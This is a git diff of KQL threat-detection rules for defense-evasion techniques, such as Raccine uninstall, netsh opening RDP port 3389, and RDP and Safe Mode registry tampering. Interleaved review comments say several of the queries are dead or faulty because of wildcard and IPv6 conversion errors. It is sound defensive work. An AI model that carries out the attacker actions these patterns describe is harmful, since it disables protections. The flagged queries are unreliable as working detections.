-// Tags: attack.defense-evasion, attack.t1036.003, attack.t1036, attack.t1027.005, attack.t1027
-// False Positives:
-// - Legitimate use of the tool by administrators or users to update metadata of a binary
-
-DeviceProcessEvents
+// Title: PUA - Potential PE Metadata Tamper Using Rcedit
+// Author: Micah Babinski
+// Date: 2022-12-11
+// Level: medium
+// Description: Detects the use of rcedit to potentially alter executable PE metadata properties, which could conceal efforts to rename system utilities for defense evasion.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.003, attack.t1036, attack.t1027.005, attack.t1027
+// False Positives:
+// - Legitimate use of the tool by administrators or users to update metadata of a binary
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "OriginalFileName" or ProcessCommandLine contains "CompanyName" or ProcessCommandLine contains "FileDescription" or ProcessCommandLine contains "ProductName" or ProcessCommandLine contains "ProductVersion" or ProcessCommandLine contains "LegalCopyright") and ProcessCommandLine contains "--set-" and ((FolderPath endswith "\\rcedit-x64.exe" or FolderPath endswith "\\rcedit-x86.exe") or ProcessVersionInfoFileDescription =~ "Edit resources of exe" or ProcessVersionInfoProductName =~ "rcedit")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/pua_process_hacker_execution.kql b/KQL/rules/Defense Evasion/pua_process_hacker_execution.kql
index b6a46bbb..19b74866 100644
--- a/KQL/rules/Defense Evasion/pua_process_hacker_execution.kql
+++ b/KQL/rules/Defense Evasion/pua_process_hacker_execution.kql 
@@ -1,14 +1,14 @@
-// Title: PUA - Process Hacker Execution
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-10-10
-// Level: medium
-// Description: Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc).
-// Process Hacker is a tool to view and manipulate processes, kernel options and other low level options.
-// Threat actors abused older vulnerable versions to manipulate system processes.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.discovery, attack.persistence, attack.privilege-escalation, attack.t1622, attack.t1564, attack.t1543
-// False Positives:
-// - While sometimes 'Process Hacker is used by legitimate administrators, the execution of Process Hacker must be investigated and allowed on a case by case basis
-
-DeviceProcessEvents
+// Title: PUA - Process Hacker Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-10-10
+// Level: medium
+// Description: Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc).
+// Process Hacker is a tool to view and manipulate processes, kernel options and other low level options.
+// Threat actors abused older vulnerable versions to manipulate system processes.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.discovery, attack.persistence, attack.privilege-escalation, attack.t1622, attack.t1564, attack.t1543
+// False Positives:
+// - While sometimes 'Process Hacker is used by legitimate administrators, the execution of Process Hacker must be investigated and allowed on a case by case basis
+
+DeviceProcessEvents
 | where FolderPath contains "\\ProcessHacker_" or FolderPath endswith "\\ProcessHacker.exe" or (ProcessVersionInfoOriginalFileName in~ ("ProcessHacker.exe", "Process Hacker")) or ProcessVersionInfoFileDescription =~ "Process Hacker" or ProcessVersionInfoProductName =~ "Process Hacker" or ((MD5 startswith "68F9B52895F4D34E74112F3129B3B00D" or MD5 startswith "B365AF317AE730A67C936F21432B9C71") or (SHA1 startswith "A0BDFAC3CE1880B32FF9B696458327CE352E3B1D" or SHA1 startswith "C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E") or (SHA256 startswith "D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F" or SHA256 startswith "BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/publisher_attachment_file_dropped_in_suspicious_location.kql b/KQL/rules/Defense Evasion/publisher_attachment_file_dropped_in_suspicious_location.kql
index c694610a..5812406c 100644
--- a/KQL/rules/Defense Evasion/publisher_attachment_file_dropped_in_suspicious_location.kql
+++ b/KQL/rules/Defense Evasion/publisher_attachment_file_dropped_in_suspicious_location.kql
@@ -1,12 +1,12 @@
-// Title: Publisher Attachment File Dropped In Suspicious Location
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-08
-// Level: medium
-// Description: Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-// False Positives:
-// - Legitimate usage of ".pub" files from those locations
-
-DeviceFileEvents
+// Title: Publisher Attachment File Dropped In Suspicious Location
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-08
+// Level: medium
+// Description: Detects creation of files with the ".pub" extension in suspicious or uncommon locations. This could be a sign of attackers abusing Publisher documents
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate usage of ".pub" files from those locations
+
+DeviceFileEvents
 | where (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\") and FolderPath endswith ".pub"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/pubprn_vbs_proxy_execution.kql b/KQL/rules/Defense Evasion/pubprn_vbs_proxy_execution.kql
index f5e7ba81..24b411db 100644
--- a/KQL/rules/Defense Evasion/pubprn_vbs_proxy_execution.kql
+++ b/KQL/rules/Defense Evasion/pubprn_vbs_proxy_execution.kql
@@ -1,10 +1,10 @@
-// Title: Pubprn.vbs Proxy Execution
-// Author: frack113
-// Date: 2022-05-28
-// Level: medium
-// Description: Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1216.001
-
-DeviceProcessEvents
+// Title: Pubprn.vbs Proxy Execution
+// Author: frack113
+// Date: 2022-05-28
+// Level: medium
+// Description: Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216.001
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "\\pubprn.vbs" and ProcessCommandLine contains "script:"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql b/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql
index 3d3c5926..11d7136c 100644
--- a/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql
+++ b/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel.kql
@@ -1,11 +1,11 @@
-// Title: Python Function Execution Security Warning Disabled In Excel
-// Author: @Kostastsale
-// Date: 2023-08-22
-// Level: high
-// Description: Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed.
-// Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-
-DeviceProcessEvents
+// Title: Python Function Execution Security Warning Disabled In Excel
+// Author: @Kostastsale
+// Date: 2023-08-22
+// Level: high
+// Description: Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed.
+// Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " 0" and (ProcessCommandLine contains "\\Microsoft\\Office\\" and ProcessCommandLine contains "\\Excel\\Security" and ProcessCommandLine contains "PythonFunctionWarnings")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql b/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql
index c6146bf3..4ebc73f4 100644
--- a/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql
+++ b/KQL/rules/Defense Evasion/python_function_execution_security_warning_disabled_in_excel_registry.kql
@@ -1,11 +1,11 @@
-// Title: Python Function Execution Security Warning Disabled In Excel - Registry
-// Author: Nasreddine Bencherchali (Nextron Systems), @Kostastsale
-// Date: 2024-08-23
-// Level: high
-// Description: Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed.
-// Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-
-DeviceRegistryEvents
+// Title: Python Function Execution Security Warning Disabled In Excel - Registry
+// Author: Nasreddine Bencherchali (Nextron Systems), @Kostastsale
+// Date: 2024-08-23
+// Level: high
+// Description: Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed.
+// Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Microsoft\\Office*" and RegistryKey endswith "\\Excel\\Security\\PythonFunctionWarnings"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql b/KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql
index dda31efe..b927676d 100644
--- a/KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql
+++ b/KQL/rules/Defense Evasion/python_image_load_by_non_python_process.kql
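Review bot: The query on the context line can never match: `RegistryKey endswith "\\Microsoft\\Office*"` is conjoined with `RegistryKey endswith "\\Excel\\Security\\PythonFunctionWarnings"`, and KQL `endswith` takes `*` as a literal character, so the two suffix tests are mutually exclusive and the detection is silently dead. The same mid-string-wildcard translation reaches the new side of rdp_sensitive_settings_changed.kql (`\\Control\\Terminal Server*`, `\\Windows NT\\Terminal Services*` conjoined with `endswith "\\Shadow"` and the per-value list), registry_entries_for_azorult_malware.kql (`SYSTEM*`) and registry_persistence_via_service_in_safe_mode.kql (`\\Control\\SafeBoot\\Minimal*`, `\\Control\\SafeBoot\\Network*`). A wildcard-terminated prefix that sits in front of a real suffix should be emitted as a `contains` on its literal part, e.g. `| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey contains "\\Microsoft\\Office" and RegistryKey endswith "\\Excel\\Security\\PythonFunctionWarnings"`. Since the commit message says these files were regenerated with the newest backend, this looks like a backend translation gap rather than a hand edit, so the fix presumably belongs in the conversion script and all four outputs should be regenerated from it.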
@@ -1,16 +1,16 @@
-// Title: Python Image Load By Non-Python Process
-// Author: Patrick St. John, OTR (Open Threat Research)
-// Date: 2020-05-03
-// Level: low
-// Description: Detects the image load of "Python Core" by a non-Python process. This might be indicative of a execution of executable that has been bundled from Python code.
-// Various tools like Py2Exe, PyInstaller, and cx_Freeze are used to bundle Python code into standalone executables.
-// Threat actors often use these tools to bundle malicious Python scripts into executables, sometimes to obfuscate the code or to bypass security measures.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027.002
-// False Positives:
-// - Legitimate Py2Exe Binaries
-// - Known false positive caused with Python Anaconda
-// - Various legitimate software is bundled from Python code into executables
-
-DeviceImageLoadEvents
+// Title: Python Image Load By Non-Python Process
+// Author: Patrick St. John, OTR (Open Threat Research)
+// Date: 2020-05-03
+// Level: low
+// Description: Detects the image load of "Python Core" by a non-Python process. This might be indicative of a execution of executable that has been bundled from Python code.
+// Various tools like Py2Exe, PyInstaller, and cx_Freeze are used to bundle Python code into standalone executables.
+// Threat actors often use these tools to bundle malicious Python scripts into executables, sometimes to obfuscate the code or to bypass security measures.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.002
+// False Positives:
+// - Legitimate Py2Exe Binaries
+// - Known false positive caused with Python Anaconda
+// - Various legitimate software is bundled from Python code into executables
+
+DeviceImageLoadEvents
 | where InitiatingProcessVersionInfoFileDescription =~ "Python Core" and (not((InitiatingProcessFolderPath contains "Python" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Anaconda3\\")))) and (not(isnull(InitiatingProcessFolderPath)))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/raccine_uninstall.kql b/KQL/rules/Defense Evasion/raccine_uninstall.kql
index 18a375f8..5819e516 100644
--- a/KQL/rules/Defense Evasion/raccine_uninstall.kql
+++ b/KQL/rules/Defense Evasion/raccine_uninstall.kql
@@ -1,12 +1,12 @@
-// Title: Raccine Uninstall
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-01-21
-// Level: high
-// Description: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.001
-// False Positives:
-// - Legitimate deinstallation by administrative staff
-
-DeviceProcessEvents
+// Title: Raccine Uninstall
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-01-21
+// Level: high
+// Description: Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate deinstallation by administrative staff
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "taskkill " and ProcessCommandLine contains "RaccineSettings.exe") or (ProcessCommandLine contains "reg.exe" and ProcessCommandLine contains "delete" and ProcessCommandLine contains "Raccine Tray") or (ProcessCommandLine contains "schtasks" and ProcessCommandLine contains "/DELETE" and ProcessCommandLine contains "Raccine Rules Updater")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/rdp_connection_allowed_via_netsh_exe.kql b/KQL/rules/Defense Evasion/rdp_connection_allowed_via_netsh_exe.kql
index bc506662..52f9dc57 100644
--- a/KQL/rules/Defense Evasion/rdp_connection_allowed_via_netsh_exe.kql
+++ b/KQL/rules/Defense Evasion/rdp_connection_allowed_via_netsh_exe.kql
@@ -1,12 +1,12 @@
-// Title: RDP Connection Allowed Via Netsh.EXE
-// Author: Sander Wiebing
-// Date: 2020-05-23
-// Level: high
-// Description: Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1562.004
-// False Positives:
-// - Legitimate administration activity
-
-DeviceProcessEvents
+// Title: RDP Connection Allowed Via Netsh.EXE
+// Author: Sander Wiebing
+// Date: 2020-05-23
+// Level: high
+// Description: Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.004
+// False Positives:
+// - Legitimate administration activity
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "portopening" or ProcessCommandLine contains "allow") and (ProcessCommandLine contains "firewall " and ProcessCommandLine contains "add " and ProcessCommandLine contains "tcp " and ProcessCommandLine contains "3389")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql
index f9247303..545a01d6 100644
--- a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql
+++ b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed.kql
@@ -1,13 +1,13 @@
-// Title: RDP Sensitive Settings Changed
-// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
-// Date: 2022-08-06
-// Level: high
-// Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
-// Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.t1112
-// False Positives:
-// - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)
-
-DeviceRegistryEvents
+// Title: RDP Sensitive Settings Changed
+// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
+// Date: 2022-08-06
+// Level: high
+// Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
+// Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112
+// False Positives:
+// - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)
+
+DeviceRegistryEvents
 | where ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)", "DWORD (0x00000003)", "DWORD (0x00000004)")) and (RegistryKey endswith "\\Control\\Terminal Server*" or RegistryKey endswith "\\Windows NT\\Terminal Services*") and RegistryKey endswith "\\Shadow") or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "\\Control\\Terminal Server*" or RegistryKey endswith "\\Windows NT\\Terminal Services*") and (RegistryKey endswith "\\DisableRemoteDesktopAntiAlias" or RegistryKey endswith "\\DisableSecuritySettings" or RegistryKey endswith "\\fAllowUnsolicited" or RegistryKey 
endswith "\\fAllowUnsolicitedFullControl")) or (RegistryKey contains "\\Control\\Terminal Server\\InitialProgram" or RegistryKey contains "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\services\\TermService\\Parameters\\ServiceDll" or RegistryKey contains "\\Windows NT\\Terminal Services\\InitialProgram")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql
index 0d23e690..c6a6d953 100644
--- a/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql
+++ b/KQL/rules/Defense Evasion/rdp_sensitive_settings_changed_to_zero.kql
@@ -1,13 +1,13 @@
-// Title: RDP Sensitive Settings Changed to Zero
-// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
-// Date: 2022-09-29
-// Level: medium
-// Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
-// Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.t1112
-// False Positives:
-// - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)
-
-DeviceRegistryEvents
+// Title: RDP Sensitive Settings Changed to Zero
+// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
+// Date: 2022-09-29
+// Level: medium
+// Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
+// Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1112
+// False Positives:
+// - Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)
+
+DeviceRegistryEvents
 | where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\fDenyTSConnections" or RegistryKey endswith "\\fSingleSessionPerUser" or RegistryKey endswith "\\UserAuthentication")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql b/KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql
index b8ed369a..63ca896d 100644
--- a/KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql
+++ b/KQL/rules/Defense Evasion/regasm_exe_execution_without_commandline_flags_or_files.kql
@@ -1,13 +1,13 @@
-// Title: RegAsm.EXE Execution Without CommandLine Flags or Files
-// Author: frack113
-// Date: 2025-06-04
-// Level: low
-// Description: Detects the execution of "RegAsm.exe" without a commandline flag or file, which might indicate potential process injection activity.
-// Usually "RegAsm.exe" should point to a dedicated DLL file or call the help with the "/?" flag.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.009
-// False Positives:
-// - Legitimate use of Regasm by developers.
-
-DeviceProcessEvents
+// Title: RegAsm.EXE Execution Without CommandLine Flags or Files
+// Author: frack113
+// Date: 2025-06-04
+// Level: low
+// Description: Detects the execution of "RegAsm.exe" without a commandline flag or file, which might indicate potential process injection activity.
+// Usually "RegAsm.exe" should point to a dedicated DLL file or call the help with the "/?" flag.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.009
+// False Positives:
+// - Legitimate use of Regasm by developers.
+
+DeviceProcessEvents
 | where (ProcessCommandLine endswith "RegAsm" or ProcessCommandLine endswith "RegAsm.exe" or ProcessCommandLine endswith "RegAsm.exe\"" or ProcessCommandLine endswith "RegAsm.exe'") and (FolderPath endswith "\\RegAsm.exe" or ProcessVersionInfoOriginalFileName =~ "RegAsm.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/regasm_exe_initiating_network_connection_to_public_ip.kql b/KQL/rules/Defense Evasion/regasm_exe_initiating_network_connection_to_public_ip.kql
index 67a400a8..bb0df4e6 100644
--- a/KQL/rules/Defense Evasion/regasm_exe_initiating_network_connection_to_public_ip.kql
+++ b/KQL/rules/Defense Evasion/regasm_exe_initiating_network_connection_to_public_ip.kql
@@ -1,10 +1,10 @@
-// Title: RegAsm.EXE Initiating Network Connection To Public IP
-// Author: frack113
-// Date: 2024-04-25
-// Level: medium
-// Description: Detects "RegAsm.exe" initiating a network connection to public IP adresses
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218.009
-
-DeviceNetworkEvents
+// Title: RegAsm.EXE Initiating Network Connection To Public IP
+// Author: frack113
+// Date: 2024-04-25
+// Level: medium
+// Description: Detects "RegAsm.exe" initiating a network connection to public IP adresses
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.009
+
+DeviceNetworkEvents
 | where InitiatingProcessFolderPath endswith "\\regasm.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/regedit_as_trusted_installer.kql b/KQL/rules/Defense Evasion/regedit_as_trusted_installer.kql
index 921895a9..1b2076fa 100644
--- a/KQL/rules/Defense Evasion/regedit_as_trusted_installer.kql
+++ b/KQL/rules/Defense Evasion/regedit_as_trusted_installer.kql
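Review bot: The private-range exclusion on the context line feeds IPv6 literals (`"::1/128"`, `"fe80::/10"`, `"fc00::/7"`) to `ipv4_is_in_range()`, which only parses IPv4 and, as far as I recall, returns null for anything else; those three ranges are therefore never excluded, and for an IPv6 `RemoteIP` every term is null, so `not(null)` is null and the row is dropped — IPv6 regasm connections to public addresses are never surfaced. The three IPv6 terms should read `ipv6_is_in_range(RemoteIP, "::1/128") or ipv6_is_in_range(RemoteIP, "fe80::/10") or ipv6_is_in_range(RemoteIP, "fc00::/7")`, and wrapping the inner `or` chain in `coalesce(..., false)` would keep a non-private IPv6 destination from being silently filtered when the IPv4 terms evaluate to null. This template presumably comes from the converter's IP-range handling, so other network-event rules emitted by it are likely affected the same way.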
@@ -1,12 +1,12 @@
-// Title: Regedit as Trusted Installer
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-05-27
-// Level: high
-// Description: Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Regedit as Trusted Installer
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-05-27
+// Level: high
+// Description: Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where FolderPath endswith "\\regedit.exe" and (InitiatingProcessFolderPath endswith "\\TrustedInstaller.exe" or InitiatingProcessFolderPath endswith "\\ProcessHacker.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/register_app_vbs_proxy_execution.kql b/KQL/rules/Defense Evasion/register_app_vbs_proxy_execution.kql
index 5721ff3d..d77ee3a0 100644
--- a/KQL/rules/Defense Evasion/register_app_vbs_proxy_execution.kql
+++ b/KQL/rules/Defense Evasion/register_app_vbs_proxy_execution.kql
@@ -1,12 +1,12 @@
-// Title: REGISTER_APP.VBS Proxy Execution
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-19
-// Level: medium
-// Description: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-// False Positives:
-// - Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign
-
-DeviceProcessEvents
+// Title: REGISTER_APP.VBS Proxy Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "\\register_app.vbs" and ProcessCommandLine contains "-register"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/registry_entries_for_azorult_malware.kql b/KQL/rules/Defense Evasion/registry_entries_for_azorult_malware.kql
index 5af6576b..d3ba1b1c 100644
--- a/KQL/rules/Defense Evasion/registry_entries_for_azorult_malware.kql
+++ b/KQL/rules/Defense Evasion/registry_entries_for_azorult_malware.kql
@@ -1,10 +1,10 @@
-// Title: Registry Entries For Azorult Malware
-// Author: Trent Liffick
-// Date: 2020-05-08
-// Level: critical
-// Description: Detects the presence of a registry key created during Azorult execution
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.execution, attack.t1112
-
-DeviceRegistryEvents
+// Title: Registry Entries For Azorult Malware
+// Author: Trent Liffick
+// Date: 2020-05-08
+// Level: critical
+// Description: Detects the presence of a registry key created during Azorult execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.execution, attack.t1112
+
+DeviceRegistryEvents
 | where RegistryKey endswith "SYSTEM*" and RegistryKey endswith "\\services\\localNETService"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/registry_persistence_via_service_in_safe_mode.kql b/KQL/rules/Defense Evasion/registry_persistence_via_service_in_safe_mode.kql
index 01f3e1d6..4d45978d 100644
--- a/KQL/rules/Defense Evasion/registry_persistence_via_service_in_safe_mode.kql
+++ b/KQL/rules/Defense Evasion/registry_persistence_via_service_in_safe_mode.kql
@@ -1,10 +1,10 @@
-// Title: Registry Persistence via Service in Safe Mode
-// Author: frack113
-// Date: 2022-04-04
-// Level: high
-// Description: Detects the modification of the registry to allow a driver or service to persist in Safe Mode.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1564.001
-
-DeviceRegistryEvents
+// Title: Registry Persistence via Service in Safe Mode
+// Author: frack113
+// Date: 2022-04-04
+// Level: high
+// Description: Detects the modification of the registry to allow a driver or service to persist in Safe Mode.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.001
+
+DeviceRegistryEvents
 | where (RegistryValueData =~ "Service" and (RegistryKey endswith "\\Control\\SafeBoot\\Minimal*" or RegistryKey endswith "\\Control\\SafeBoot\\Network*") and RegistryKey endswith "\\(Default)") and (not(((RegistryValueData =~ "Service" and InitiatingProcessFolderPath =~ "C:\\Hexnode\\Hexnode Agent\\Current\\HexnodeAgent.exe" and (RegistryKey endswith "\\Control\\SafeBoot\\Minimal\\Hexnode Updater\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Network\\Hexnode Updater\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Minimal\\Hexnode Agent\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Network\\Hexnode Agent\\(Default)")) or (RegistryValueData =~ "Service" and InitiatingProcessFolderPath endswith "\\MBAMInstallerService.exe" and RegistryKey endswith "\\MBAMService\\(Default)") or (InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\msiexec.exe" and (RegistryKey endswith "\\Control\\SafeBoot\\Minimal\\SAVService\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Network\\SAVService\\(Default)")))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/regsvr32_dll_execution_with_suspicious_file_extension.kql b/KQL/rules/Defense Evasion/regsvr32_dll_execution_with_suspicious_file_extension.kql
index 322e2104..478e0a28 100644
--- a/KQL/rules/Defense Evasion/regsvr32_dll_execution_with_suspicious_file_extension.kql
+++ b/KQL/rules/Defense Evasion/regsvr32_dll_execution_with_suspicious_file_extension.kql
@@ -1,12 +1,12 @@
-// Title: Regsvr32 DLL Execution With Suspicious File Extension
-// Author: Florian Roth (Nextron Systems), frack113
